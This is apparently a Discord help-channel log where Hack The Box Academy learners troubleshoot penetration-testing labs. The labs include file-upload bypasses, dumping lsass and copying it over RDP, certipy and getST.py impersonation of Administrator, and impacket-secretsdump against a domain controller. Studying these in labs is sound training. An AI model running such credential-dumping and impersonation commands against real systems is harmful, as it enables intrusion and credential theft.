#modules
Tnx
I'm brand new and want to learn as quick as possible. I'm seeking a career change into cyber security.
depending on what u wanna do it takes 1000s of hours its a lot to learn cant really speedrun it
brah i finally got the flag i thought sum was wrong with the lab lmaoo
You don't need to add it to /etc/hosts for vhost fuzzing, if you specify the IP and port. I'm assuming they tell you to add it to /etc/hosts so you can visit the page after you have discovered it.
Can anyone help here iv got a shell on the machine and keep looking through logs but cant find the pass 😣
like iv dun the 3 sections after it
module
Thanks!
Hello, I am a beginner. Can restrictions be removed from ChatGPT?
Hello people, File Upload Module --> Whitelist filters. I have managed to bypass the whitelist and blacklist filters and upload php files (various via burp intruder), but I cannot access them! I get 404, even though I should get at least something
How are you trying to access that uploaded php file?
Via /profile_images/shell.inc (.phar, .phps, etc)
It returns 404 for all the bypasses that had "File successfully uploaded" message. /profile_images/ comes from HTML code inspection, it has to be the same for most exercises in the module...
did you try the reverse double extension technique?
Yes, I am using a wordlist with different double php + image extensions, reverse and not reverse. This is already bypassed. The file is getting uploaded, I do not understand why I cannot access it in that dir
Maybe the server is rejecting code execution. Not all extensions will work with all web server configurations, so we may need to try several extensions to get one that successfully executes PHP code.
There is a list of 570 different double extension payloads that are processed by burp... But it's really slow. I really need to use ffuf for this to check
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
UPD: Works. With the last payloads from the list. For the love of god, please have mercy and put it at 30 or 40, i dont have that much time tbh...
oops. wrong chat!
attacking common services - hard
Once logged in, what other user can we compromise to gain admin privileges?
i have tried a lot of stuff but can't figure out what to do here ... i just need a single short hint ..
Hey, I go through CJCA learning path and in Linux part - "Backup and Restore" there is exercise to practice rsync, and do backup to local pwn machine. What is the password for local user to ssh to 127.0.0.1?
im redoing password attacks: Pass the Hash
whenever i rdp (remmina) using pth, i can only do it once, if i exit out and try again it tells me that the username\password is wrong
how do i rdp in again if thats the case
Maybe try another RDP client
No what I mean is pls check your discords
Bc sm might be hacked
And ty but I've been in this server for almost an year
I'm usually off but I will try to be more active
Btw I did what u said and I still don't have access I did that like 6months ago
Ok
Ama do it again
And see if it works
It may be out of topic, but do you recommend me finishing the CPTS and then sec+ or the other way around?
Where can I post jobs?
Security+ is a beginner-level cert aimed at security fundamentals. CPTS is a lot more technical, hands-on, and pertinent to pentesting, akin to the OSCP.
So consider sec+ first, then move on to CPTS (although you'll probably still need more studying before tackling the latter)
Hey
Alright thanks man I appreciate it
user impersonation
Don’t cross post @stoic heart - posted in all wrong channels - #1024429874246590575 might be better. But we’re not your homework helpers
I don’t have permission to post in other channels
Saw your post now in #1024429874246590575 - one place is more than enough
Also - if you want access to more channels, all the instructions you need are in #welcome
Hey guys, I tried to figure out what the problem is and tried to fix it but I can't. Any idea? On my laptop it is not working, I have what you can see on the screen, but on my pc home when I do a multi handler of this (like in the module) everything is good (module tunneling and pivoting section meterpreter)
OSINT: Corporate Recon | Section staff
that seems like it should be the number but it doesnt work ? ( also not working with +1 )
i cant hit finish , even though i have submitted the flag , what do i do ?
You probably didn’t end all sections of the module
The last 2nd one I have submitted the flag and it has also accepted it but... Won't let me go further
Maybe you forgot a question to complete?
Or try a refresh of the page
Naa.. only had 1 question to submit the flag ..
Done several times
Hmm weird maybe just an issue i guess can’t help you further ^^
Dude... 
i keep getting stuck at the filter contents for linux where i need to: How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
looks like the medium skill lab you're missing something
ss -a is still grabbing interfaces that you may not want it to; break the question down
It won't let me even update the flag ...
It's just stuck
did you click 'complete & next' on that page?
Ya I did ..
otherwise reach out to support on the website
looks like it's telling you what it wants you to do load stdapi; for whatever reason it's not loading here
Already tried but nothing happens
if it's not the pwnbox then there's gonna be very little help aside from advising you to reinstall meterpreter/msfconsole ¯\_(ツ)_/¯
if it is in the pwnbox -> reach out to website support
Hi all, can someone give a hint on how to solve the last challenge of the "Introduction to NoSQL Injection" academy module? I already tried all payloads seen during the course.
I'm guessing it is Server Side JavaScript Injection but
- I can't see any javascript on the pages
- I can't find an oracle
I also tried fuzzing the three requests (/login,forgotandreset) with the two wordlists mentioned in the course without any result, I'm pretty stuck, if someone could help with a slight hint that would be great 🥹
where is this thing in academy 2.0 ? do I need to open my eyes or its missing
I'm guessing it's not available yet cause of beta. 
Hello, I think there is a bug on the Skills Assessment - SQL Injection Fundamentals. I managed to login to the app, and found out the supposed vuln parameter within the chat. However, it always returns 200 ok, and the chat disappears entirely no matter what, unless the param is just a text without any sql. At this point, I took a look through solution as I was stuck, follow the exact steps, which already did before, and have the same persistent issue. Any thoughts?
I have restarted the target machine, and it works now as intended
not every module has a resources button
Hi all im new here, I have been with HTB before but decided to make a new account
Hi guys I'm stuck on SQL Injection Fundamentals: Skills Assessment - SQL Injection Fundamentals
I'm been stuck on the first question "What is the password hash for the user 'admin'? ", and I've tried all the different type of auth bypass injection for the login page, but they give me errors. The module says I need to use Burpsuite but Idk how I'm supposed to use it for this section.
Hi guys, im new to ctf. May i ask how long roughly it's covered?
Can I finish CPTS just with the pentester job role path?
Sorry if this isn’t the right spot. Are there groups that tackle Bug Bounties? These critical bugs have good payouts that could be divided across a team of hunters
This module is a tier 0 "free" module. What is the total cubes that will be rewarded back to you by completing it?
help me
It costs 10 cubes and you get 10 cubes back I believe
Incorrect answer!
Error Incorrect answer! It appeared like that
This answer is absolutely correct.
ok
While you are working on the module, there will be questions that you have to answer. These questions will sometimes give you cubes in return. A total of 10 cubes. Not all questions reward cubes. They are distributed in such a way that when you have finished the module, you will have received the 10 cubes that you spent to unlock it.
Is there something i'm missing about sqlplus? I'm working on the footprinting module and its saying use sqlplus to login to the oracle db but when I try to use it in the pwnbox it wont install and when I try installing it both on the pwnbox and on my own system it says it can't be located
Hey can anyone help me with the skill assessment 2 for introduction to evasion techniques i tried creating a vbsvrupt and putting it on the target folder but not getting a shell
which module
because its available with some other name
no worries ...verify youself to access other channels #welcome
yes you can
The intro to windows evasion one I managed to find the flag couldn't get a reverse shell had to start a server and capture the flag on desktop of the user that clicks on the file
Vulnerability Assessment - Nessus skills assessment
"Alternatively, use the pre-populated scan data to answer the questions below without having to wait for the scan to finish but feel free to practice configuring and running it." where can i find the pre-populated scan data?
U can dm me
Hello everyone…
new here is it possible to do the modules in a virtual machine if I don’t have a paid account
Do you mean your own VM? yes of course, however the pwnbox (the provided vm) can only be spawned for 2 hours a day (iirc) for free users.
...
Yea the 2 hour limit is my issue why I’m wanting to run in a virtual machine
Yeah you can use your own vm, but target lifetimes are maxed at 6 hours per spawn. You can of course re-spawn it but whatever work you will have done is gone.
Ah I see thank you
it's on the target
hi im new to HTB. im working on one of the network fundamentals module and i wanted to do the extra skill assessment. some how i cant to ctrl-v in shell?
ctrl+shift+v into terminal
mmmh more specifically?
the part im on says i have to do user anonymous ctrl+v enter enter and it just says command not found
connect to https://target:nessusport and there should be a scan in the history
oh
The target is that one has spawned or 172.16.16.100?
the target that's spawned, you have no way of reaching the internal network from the outside
yeah pressing ctrl+v -> Enter MANUALLY inputs the escape character sequence for the enter key [^M]
Because 172.16 is a private IP address?
ctrl+v enters "verbose keys" mode
no; because it's a separate internal network; 10.129.x.x is also a private ip address
exactly, but ok
the vpn only gives you access to the 10.129.0.0/16 range of targets
got it
For Hack The Box VPNs treat 10.x ips as if they were public ips. Other than that you can retain the private and public classifications
Another question, when i put the credentials in Nessus in Windows section, whats the goal of it?
? wdym? for a credentialed scan?
Nessus does a wide sweeping scan; if you provide credentials, it attempts to log in and enumerate using said credentials on various services
Yes, because i see that also in Assessment --> Brute force there a box where putting credentials, but i want to know the difference between this section and the dedicated Credentials section
there's 2 types of scans (in general) credentialed and non-credentialed
i have put credentials for windows
You don't really need to do the scan yourself tbh, as was already stated there's a pre-populated scan... unless you WANT to wait like an hour for the scans to finish
whats the difference?
the credentials you provide will be used to attempt to log in to services
with a non-credentialed scan, the only attempt to be made would be for anonymous/null sessions
Brute force: You provide a list of credentials and it will try all of them but not go further
Dedicated: You provide known credentials and it will utilize them to scan the internals
I generally wouldn't concern myself too much with learning the ins and outs of a vulnerability scanner tbh
internals so?
[unless it's actually part of your job]
internals as in services on the system
I generally dislike this module as part of the path because it's just a dartboard module; throw stuff at the dartboard and see what sticks
vuln scanners can be useful, but they're more of compliance checklist tools than they are fully helpful, like linpeas/winpeas
I only really liked the theory parts of it.
sure, you'll find SOMETHING but like you'd find it faster just manually enumerating
is this not a phase of a pen test?
no
It's not a phase, it's a tool for a phase.
the third phase is vulnerability assessment
Vulnerability Assessments are done in the early stages of security hardening
before a pentest is performed
Vulnerability Assessment IS NOT Vulnerability Scanning
whats the difference?
A vuln assessment is just there to tell you of POTENTIAL vulnerabilities; A vulnerability SCAN is to actually go through and verify what is/isn't vulnerable
i thought that when u have performed Information Gathering, i have to go on with vulnerability assessment
Vulnerability Scan: Automated way of locating POTENTIAL vulnerabilities, detected in automated ways (it's a form of information gathering)
Vulnerability Assessment: Judgement of the pentester on whether a vulnerability is worth looking into and continue to exploiting and so on (chance of exploitation, complexity, and chance of damage)
I think that's kinda incorrect w1ld as a vulnerability assessment is a form of auditing as well
If this module named Vulnerability Assessment, why is not?
Well yeah, you're auditing which vulnerabilities you found are real and which are probably not applicable or out of scope
It's a different thing entirely; A company will perform a Vulnerability Assessment PRIOR to actually hiring pentesters in order to qualify their scope
i think that the using of Nessus come after the Information Gathering
The module goes over the theory behind Vulnerability Assessment, and then discusses vulnerability scanners which is a tool used to aid in vulnerability assessment (i.e. actually locating the vulnerabilities)
A vulnerability assessment just shows potential surface level vulns that a company can harden prior to having a pentest performed.
But that's why i hate the scanners as a whole because, again, dartboards
ok and the third phase of a pen test process called Vulnerability Assessment when is performed? And which tools are used?
yeah ngl I just realized we were talking about two different things...
IMO those should be called Vulnerability Audits, rather than assessments since Vulnerability Assessment is a part of the process in Pen-Testing 
yeah; and that's what the module is actually talking about, vuln audits rather than vuln assessment imho
it's not a bad module; but its placement just also feels lacking
exactly, this is why i am confused
?
your brain
you shouldn't necessarily need automated tools in order to hunt vulns
the only time you'd need an automated tool is if you've tried literally everything else and haven't moved forward
so the process is Information Gathering --> look at the results to see if something could be vulnerable (Vulnerability Assessments) --> Exploit
right?
Added an erratum, hopefully this clears up misunderstandings in the future https://discordapp.com/channels/473760315293696010/1426851885691834458
yes
yep, Just understand that that module is talking about "Vulnerability Scanning" not Vulnerability Assessment
and this is just a way to perform Information Gathering and Vulnerability Assessment using an automated tool like Nessus?
It was honestly one of my least favorite modules because i didn't really 'learn' anything off it, just "here's a scanner that will likely provide false positives, have fun"
even then it's not really performing vuln assessment (For info gathering) it's just "here's a ton of potential problems, and most of them are benign, oh and some stuff is marked as info but it's actually important probably"
hey guys silly question so ive installed bloodhound from https://bloodhound.specterops.io and followed all the steps there for how can i enable and disable ?
It's not a way to perform Vulnerability Assessment(phase) on its own, an automated scanner cannot be the judge of vulnerabilities, only the tester can.
nvm my bad just found out i can do it from the tool syntax 🤦‍♂️
Obviously, I meant that this tool provides you with a lot of information that can be evaluated by the tester, instead of performing Nmap against a target and searching on Google for known exploits about the service running on it.
honestly the nmap and google strat is 10x faster; because even then the nessus thing you still need to google exploits
i will proceed to delete this module from the Vulnerability Assessment phase so
you've done the nmap module yes? then you should know nmap itself can act as a vulnerability scanner
--script vuln
don't think of any of these tools as the end all be all, treat them like tools in a toolbox, if one doesn't fit or work, then find one that does.
there's a reason all these modules cover multiple ways to do the exact same thing
you right
at this moment i have done only the Information Gathering phase, i know Nmap and little else
bro's gonna have so much fun when he's finally exploiting things 
so can i think Vulnerability Assessment and Information Gathering as a single phase right?
i really think so
@waxen totem
Little update on NoSQL Injection: the oracle was ||Content-Length HTTP Header|| . Module completed
Well, you can do them in tandem but that becomes cluttered really quickly especially without the experience
it's better to have all the information before making a judgement is all.
for example, an FTP server that can be accessed with Anonymous login is already a vulnerability, right?
yes but depending on others that you find you might want to pursue it, you might not
of course
don't judge a vulnerability too quickly
so the vulnerability assessment is just a phase where u study the information you got before
is it right?
You might think: Ohh this is a low impact vulnerability since it's easily fixed, but what if you have an ssh key in there? or a RootCA?
Not just study but rate, the best example of a rating for a vulnerability is its CVSS score.
Present in that module
CVSS highly depends on Impact, not just vulnerability itself.
^
experience
also in-general, you should be able to roughly defend your CVSS score you provide.
i.e. normally this would be an info/CVSS 1.0 however, this vuln leaked extremely sensitive credentials
You mean I can't have all my 20 findings be critical 10.0 vulnerabilities? 
10.0; I was able to exploit it, and i'm terrible at this
in the CVSS site linked on the module is there an explanation about the score?
TLDR: something you can exploit on its own yes counts as a vulnerability, BUT a chain of exploits also counts as a vulnerability.
Imagine you have anonymous access to a file share with an encrypted zip file containing, ssh keys, but the zip encryption is crackable.
Weak Encryption Password- Vulnerability
Anonymous FTP login - Vulnerability
SSH Key leak through Anonymous FTP login and Weak Encryption Password - MASSIVE Vulnerability.
CVSS deals with the CIA triad
and some other factors
i.e. how do you access this resource [can you access it externally or is it required to be on the same network]; is there some other factor involved, does it breach any part of the CIA triad
of course
so do you get why you want to gather all the information before making an assessment?
i.e. i wouldn't necessarily say something being hosted on the admin share is a vulnerability in and of itself
because, if only admins can access the share -> then it's relatively confidential
making a syntex, Vulnerability Assessment can be done rating the informations i got before, using CVSS and CVE
and personal experience
but it describes the impact of a vulnerability
because an anon share can have absolutely nothing on it; thus making it more of an informative vuln like "Hey some idiot spun up a share and it was never taken down"
Yes but Vulnerability Assessments are used to figure out: Alright, where do we start in this massive swamp of vulnerabilities
^
you don't know the impact a vuln could have until AFTER you exploit it
clear
was just using CVSS as an example on how to rate vulnerabilities, but you should be fine by just judging: high chance of exploitation, low chance of damage to systems, and low complexity
in general after the scanning phase you want to rank the potential vulns in order of most to least likely and start there
so the correct definition is: Vulnerability Assessment can be done rating the informations i got before using personal experience and google
Vulnerability Assessment is the prioritization of vulnerabilities to exploit in order, based on personal experience and google
clear
really appreciate your help guys
I like to think of it this way as well: Say you have 2 vulns presented, anon share and an SSH server that MAY BE vulnerable to shellshock; the more likely thing is anon share and you start your enumeration from that point instead of diving down the shellshock rabbit hole
and your list could also be ranked in "how comfortable am I in attempting to exploit these potential vulns"
and you go back into info gathering when you reach that one vulnerability in the list that you really couldn't be bothered to exploit 
Oh it's possible just with that?
Hello guys, I need help with the SeDebugPrivilege Section in the Windows escalation module. I was able to use mimikatz to make the lsass.dump file... but since im using xfreerdp3, I have no clue how to actually get it to my own system to crack it offline.
Is anyone able to help?
xfreerdp has the /drive: option
/drive:name,/path/ or /drive:/path/,name
Do I have to run it as I use it to RDP in? Or can I open another terminal and do it that way?
yes you have to use it as you rdp in, otherwise you can start up an smb server
with the /drive: name,/path/ you mentioned. I assume path is the path to where the file is... is name the name of the file I assume?
reverse shelling after making it semi interactive with /bin/bash it gets stuck on some commands and takes a while before I can execute something else, any fixes?
/path/ is the filepath on your local system
name is what it'll appear as in the file viewer; it's spinning up a share, basically
So... im struggling to connect some dots here. So its spinning up a share for all intents and purposes... I'm not following how this helps me get the file on the remote machine locally.
in the cmd line on windows it would be //tsclient/name
the /drive:name,/path/ mounts a local filepath to the rdp client as the name you give it
i.e. an inconspicuous name like "Tools"
for instance if you want to transfer files to/from the session and don't want a dedicated folder to use you can use /tmp
so /drive:tools,/tmp/
and it will mount YOUR /tmp/ folder on YOUR linux machine
in the remote session you can drag and drop files to/from that folder to transfer files
is cp or move a thing in windows cmd?
or use the copy command
but you'll need to use //tsclient/tools/ (for example) to copy a file over
or move iirc it's move and copy; windows is more verbose in a lot of its commands
fun fact: the rdp binary in windows is called mstsc.exe -> Microsoft Terminal Services Client. that's why it's mounted as //tsclient/name
where name is whatever you decide to name it
?
Alright this is the command in linux I ran:
xfreerdp /drive:test, /test/ /v:$target /u:<redacteduser> /p:<redacted password>
I exported the ip into target
does /test/ exist?
yes it does
anyone encounter problems trying bloodhound-python and nxc-ldap-bloodhound around module-163(AEN)?
is this a ligolo-ng specific problem?
and you can't find the file location in the file explorer on the windows side?
when i run //tsclient/test on windows it says "The network name cannot be found"
oh also error being related to dns and ldap timeout mostly
yeah i wouldn't worry about that
can you copy over a test file using
copy <file location on windows> //tsclient/test/
Miss click. Thanks
if it's an error relating to timeout it's likely a network issue; is there a problem with running the collector directly on the machine instead of remotely?
collector also get ldap problems I remembered
though it should be the same host the module is telling me to run sharphound on,
with full access of course
i suggest going through AEN blind especially if you've gone through the CPTS course
that means just spinning up and going from boot to Domain Admin (or highest priv level)
and not answering the questions
or reading the module
agree
I am in half the way through
Initially I tried to do it blind but I head into some roadblocks real early on so I just went lazy lol
then you're gonna struggle hard on the exam
learn to tough it out and fight through the roadblocks instead of looking for the easiest way out
AEN blind is a test of your methodology and notes
it's not JUST about completing the module, it's about hardening your methodology and problem solving skills
it's alright to take a peek if you feel like you've tried everything, but you shouldn't be using it as a guidebook. The simplest thing to do is reset the target and see if that resolves the issue, getting back to that same point would be trivial
So... it keeps saying my syntax is wrong... the command on windows: copy C:\Tools\Procdump\lsass.dmp //tsclient/test
specify the / at the end and maybe specify the filename as well
now I just kinda memorized the methodology of passing through the first few machines
Maybe I'll take a break to reset my mind first
wrong, you didn't memorize the methodology, you memorized the methods
is lsass.dmp not specifying the file? the file name is lsass.dmp?
as in specifying it to the file location you're copying to
it also says the system cannot find the specified file
cannot find specified file
is that on the local end? that means that lsass.dmp isn't where you think it is ig (procdump can still run even if you specify a bad file location iirc)
I already ran procdump and it created lsass.dmp
The file path to lsass.dmp is: C:\Tools\Procdump\lsass.dmp
and you can verify that it does in fact exist? :)
I'm staring at it right now
then try this: open the file explorer -> this pc -> tsclient -> test
ye
ok. thank you so much
no idea why it's not working via command line but also sometimes it's tricky ¯\_(ツ)_/¯
i mean the alternative is mounting it as a drive using net use
I was honestly close to saying screw it and spinning up a smb server and just doing it that way
but that may just be a "windows is dumb sometimes"
typically // and \\ is automatically translated with windows, but some commands can be touchy
sooo... now I have a different issue
When I go to drag and drop, the rdpclient keeps flickering on and off almost... and it doesnt finish copying over.
It gets to like 40 percent and then flickers and never copies and I have to keep moving it over.
stuck in file uploads module. Able to upload the php file but cant find it in the uploads directory even after the correct naming scheme
nvm
We got it over.
Also direction didn't matter for me sooo I dont know what was going on there.
But we got there. I appreciate it. Thank you!
We are in fact not there yet... I'm now having issues parsing the dmp file locally... its encrypted and I don't know how to decrypt it so I can run it through hashcat.
When I finish the information security foundations, do I just jump straight into pentesting job role path or are there any other paths I should be doing or modules that you guys recommend?
it shouldn't be encrypted, but you will need certain other files to read it properly
IIRC it's SAM and SYSTEM
So secretsdump.py?
you can jump straight to it
yeah
kk
can someone help
DM me
Anyone got a pointer on this? really confused as to why the number i found isnt the correct one. (OSINT: Corporate Recon | Section staff)
Hello, everyone! I am having an issue with the Password Attacks: Credential Hunting in Windows module.
I found the answer to the question “What is the default password of every newly created Inlanefreight Domain user account? (Format: Case-Sensitive)” in the script, but it is not being accepted. I would be very grateful for your response.
delete flag bro
i dont understand? both screenshots are flagged as spoilers for a reason
Yeah... but still dont post them. I also believe its against htb TOS to post any kind of spoilers... especially flags for anything not tier 0.
how else do you want me to show that the only given flag is "incorrect"
Ask for help and see if someone is willing to have you DM them to talk in private about it
Or just say what you did and mention that the flag you saw is not showing as correct
someone who is able to help will when they have time and see it
i still dont understand whats the fuss about since its clearly marked as spoiler but here ya go
point is that it is still visible u could blurr or draw smth on it to leave only format of flag
hey guys, im currently doing the network enumeration with nmap module, on nmap scripting engine there is a question "Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.". i used ||nmap 10.129.2.49 -p- -sV --script banner | grep "_banner" ||and got the result, but the found flag is shown as incorrect? not sure if it matters but im using beta
^when i didnt use ||grep|| there werent any ||banners other than what I have here||
i have problem with one module where i need to start a box and find how many software interface modes are available but it seems there are none but answer was 2
Check the driver capabilities for the interface. How many software interface modes are available? (Answer in digit format: e.g., 3)
Advice on LLM Output Attacks - Skills Assessment
Im stuck and no out of ideas to try, can someone point me toward right direction?
could anyone give me a nudge for advanced sql injections skills assessment question1? having trouble || dumping password hashes||
Guys
"Above, we created the user JLawrence and did not set a password. So this account is active and can be logged in without a password. Depending on the version of Windows we are using, by not setting a Password, we are flagging to windows that this is a Microsoft live account, and it attempts to login in that manner instead of using a local password."
Can anyone explain this in regards to the cmd in the section above it?
Module: Intro to Windows CLI Section: User and Group Management
What is meant by live accounts, isnt the no-password login similar to a guest account?
Maybe it's the wrong flag and must be used with another question.
That's a flag for a different section; look closely at the examples and draw conclusions of where to focus from there
thank you, it seemed a bit familiar
Can someone help with module common attacking applications
The submodule
Thick client applications
Can I compile java with IDE like eclipse?
Or is necessary to do commands in powershell?
You can DM me
If you're still stuck
Sorry ik this isnt the right channel but why is this the only channel i can talk in
I'm stuck on Skills Assessment in ADCS Attacks module
I managed to get machine's certificate dev01.pfx but it fails to authenticate
||
certipy auth -pfx dev01.pfx -dc-ip 172.16.19.3
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
Though I can use -ldap-shell and set_rbcd
I can't get a ticket to proceed
getST.py -spn cifs/DEV01.LAB.LOCAL -impersonate Administrator -dc-ip 172.16.19.3 lab.local/tom:tom123
||
@zealous hazel Have you verified your account?
About the previous conversation about Nessus, would you insert it into the Info Gathering phase instead of Vulnerability Assessment?
i dont think i have. do i have to verify with my phone number?
No, with your HTB account (see #welcome ). I may be wrong and there is something else blocking you from posting in other channels, hope I'm right though. You can also check this https://help.hackthebox.com/en/articles/5193100-welcome
Hello all, I'm having the same issue as this guy (though he didnt get an answer), aquatone is too old its completely broken I downloaded it the exact way the course shows (e.g. latest version which came out 4 years ago) the repo has been archived since 2023 and when I generate the report it's completely broken (while eyeWitness scan worked amazingly).
Requests:
- Successful : 15
- Failed : 0
- 2xx : 15
- 3xx : 0
- 4xx : 0
- 5xx : 0
Screenshots:
- Successful : 2
- Failed : 13
Either there's something very wrong with my setup (go/1.22) or the flag is impossible to get
What does the header on the title page say when opening the aquatone_report.html page with a web browser? (Format: 3 words, case sensitive)
Does anyone know how to skip this? (/module/details/113 -> Application Discovery & Enumeration)
Module: Introduction to Windows Command Line
Section: User and Group Management
Anyone, a little help? It asks "Connect to the target host and search for a domain user with the given name of Robert. What is this users Surname?" and every time I try to filter for him, it says "Server has rejected client credentials"
genuine question but im expected to complete the linux fundamentals module in 6hrs according to HTB academy, is this seriously realistic progress and learning?
you should try to absorb the material it's really only up to you
i feel like i can only achieve that time if i make no notes and dont practice
just confusing
Hey, send me a pm I definitely got the answer by now
do you have prior experience with linux?
sort of (i also main arch) but im still being met with unfamiliar concepts
so ig i dont have as much as i thought
tbh idk what my experience level with linux looks like, im not too confident abt it
i think its best i open up a thread in #1024429874246590575
Hey, send me a pm if you'd like I can help you with a nudge
Ya sure thanks man
hii guys how to get sharable link of htb labs
Hello guys
Please I am new here and I needed guide and I am interested to learn cyber security
Please how can I get started??
It gave you creds for the other user to connect with using SSH.
hi guys
who can help me to reverse ip?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@wooden niche ^
Thanks
no one that can help out on this ?
|| A number is displayed on the website. Your reasoning is certainly sound, but the question asks for "at least." Therefore, you do not need to add anything.||
i swear i am going mad i entered the number, without adding sth, like 5 times yesterday, and it didnt work but it just worked and now i doubt my sanity (i even entered all numbers from 1-100 manually) 
well it works ... thx ! :D
@acoustic owl thx for your response but it's not working
Well, if there is no PTR record, it is not possible to determine a domain.
what percentage can succeed?
DNS is like a phone book. Without a PTR record, there is no way to resolve the domain.
ok thx
Question: Try to read the details of the user with 'uid=5'. What is their 'uuid' value?
I got the "staff_admin" cookie by going to uid 10, can i have a hint on what im missing because ive tried entering 5 in api endpoint like the hint said.
Greetings
I have a question why is it that when I connect with a vpn I can't get the flag but as soon as i tried it with the htb box I had the flag with the same command? It happened to me twice in different modules and I found it weird
Maybe your vpn wasnt actually connected you can Always check on settings try setting up the kill switch for more privacy
And proton vpn or surfshark if you want your data not to get leaked :)
Web Attacks, IDOR. But I managed I get it via curl in terminal lol. Burp wasn't working because I got confused
Depends on multiple reasons. HTB Machine is connected by default to the VPN, you may not have connected properly and therefore you were unable to connect to the target
I used the academy VPN not any personal VPN
Were you connected to it?
And were you able to ping target?
If not I wasn't even going to be able to ssh the target
So you did SSH in?
I was clearly in the machine
Yeah
Don't think the commands you ran were the same then.
Depends on context of cmd though, I don't know what they are.
lol
I happened man I'm just complaining and if you want to it was on the enumeration with nmap
You wanna show me what you ran for both exactly?
If it's allowed. put a spoiler
If you want to ofc.
I will not I don't to get banned
If there's no flags in it it's not bannable
And it's ok on htb forum saw somebody complain of the same issue and from the same module
It's actually a flag I wanted to get
No I mean in the command itself.
Just hide the actual thing you submit. Not the cmd.
Another I couldn't get a file from the ftp servers on the following module but the htb box I could is it supposed to be like that just asking
yeah this was pretty cool but took a long time and a lot of scripts to run LOL
--script http-enum I believe gets you there the quickest
yeah i saw "the thing we need" few other times while scrolling through walls of text some scripts gave me but i didnt rly think the answer was right in front of me, ngl i think this was an interesting lesson to leave no rocks unturned and i hope more modules will be like that to force that approach upon students
Hello
Hi a short question to the module "AI Data Attacks" is there a jp notebook which I can spawn. If yes where do i find it?
Ok problem solved i installed it myself on the parrot system
windows privesc well me an my AI are stupid we cant find out how you can find out what privileges are set when you are allowed to run powershell as administrator
Hi! Can someone help me with the Pass The Certificate session on the password attacks modules, i rlly cant get the administrator flag. Pls dm me
so i'm having issues getting to connecting with vm
which module is it, and did u tried with the -Pn flag in nmap
also i dont think is a good thing to share flags, but idk
i'm like really new to all of this but it's the fawn
starting is the thing that matters, try using the Pn flag with nmap, windows sometimes block ICMP packets
oh ok i'll see
that works but it doesn't show me the ftp version which i'm needing for the current question
try again using the sV flag
If anyone is able to explain? Thanks.
-sV gives host seems to be down message
both the Pn and sV flags?
nmap -sV -Pn
together?
this seems to have worked thank you
the Pn flag assumes the host is up ( it doesn't send ICMP requests to verify), and the sV grabs the banner and run some scripts to try and verify the service and version running on the port
oh i see thank you... fawn has been pwned thanks to you, will note that down as well.
Question: is Kali or parrot better for modules
I'm currently trying to install smbclient on parrot and having issues
Hi everyone! I need a help in Attacking Web Applications with Ffuf.Filtering Results lesson, it says to add the htb.academy URL to etc/hosts so I can send a request using the Host header for vhost fuzzing. Could you please tell me why I need to add the IP address to etc/hosts? Why can't I just specify the full IP:port in the ffuf request?
DNS substitutes ip instead of URL.
So, with etc/host like this:
94.237.57.115 academy.htb
These two requests will be equivalent:
curl http://94.237.57.115:49747
curl http://academy.htb:49747
So, I don't have to add a DNS record and just send the request.
ffuf -w subdomains-top1million-20000.txt:FUZZ -u http://94.237.57.115:49747 -H "Host: FUZZ.academy.htb" -fs 0
but it returns an error.
And the next request without the host header works correctly.
ffuf -w subdomains-top1million-20000.txt:FUZZ -u http://94.237.57.115:49747/FUZZ
You have to make your attacking machine recognize the domain name so:
- It's easier to remember a domain name than it is an ip
- to have requests be accurate to what the target is expecting
- to be able to add subdomains when you do find them e.g
academy.hackthebox.com, if you do a vhost scan on hackthebox.com and find academy in your ffuf output
TLDR; cos you can't make a request to: example.academy.htb:49747 using example.94.237.57.115:49747 that's not a thing
But for your fuzz command you're filtering incorrectly and you have a typo: FUZZ.academy.htb. you added a . by mistake at the end, it should be FUZZ.academy.htb
I tried it without . and the result was the same.
can you show what happens when you remove the filter?
Module: Password Attacks
Section: Writing Custom Wordlists and Rules
hi guys, i have stucked on this section for 1 day. I have tried manually creating the password, then expand it using oneruletorulethemall, but it still not working, can someone share some tips on it?
https://academy.hackthebox.com/module/147/section/1391
Hi, can someone help me to understand the CVE web site or NVD website to see the specifications about vulnerabilities?
im browsing but i didn't see nothing yet
Solved
was bout to say: did you try the rule list provided in the module? hehe
Hey, on the Nmap module, on the hard lab I wasnt able to do it and ended up looking at a writeup, but I still dont understand the solution. Is it common to enumerate all the filtered ports and try to communicate manually? Im guessing automating a tool would be useful but I want to know if this is a common practice or done in this lab because the question is to get a service's version.
Mannually communicating with a service isn't done too commonly but it is very useful to know how to do.
Module: Password Attacks
Section: Skills Assessment
Link: https://academy.hackthebox.com/module/147/section/1356
I submitted the ntlm hash for the question. It got marked as correct.
However, I the Mark Complete Option is not showing up. ( I Have completed all other sections and marked as complete too)
Module: Stack-Based Buffer Overflows on Windows x86
Section: Remote Exploitation
Link: https://academy.hackthebox.com/module/89/section/952
I think I did everything right. I get a connection from the reverse shell but the connection closes after 5-10 seconds, and I don't get the shell on the windows machine.
I used windows/shell/reverse_tcp on msfvenom
Need some help guys I am lost.
Yea i did, but still not working with hashcat, maybe internet issue too slow on cracking, but then i get to do it with jtr
heyy guys
I'm having some issues with secretsdump in the Pass the Certificate section (Password Attacks Module).
$ impacket-secretsdump -k -no-pass -dc-ip 10.129.234.109 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] 'NoneType' object has no attribute 'getRemoteHost'
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
When i use the -use-vss flag (as the output is saying) i receive this error:
$ impacket-secretsdump -k -no-pass -dc-ip 10.129.234.109 -use-vss 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...
I abused of the NTLM RELAY attack and now i need to dump the hashes but i'm having this error
thank you in advance.
Check you have a valid Kerberos ticket (since you used -k).
usually you have to split ut 'domain'/'account'@host but when secretsdump suggest -use-vss or other flags there is usually some underlying problem use -debug as well
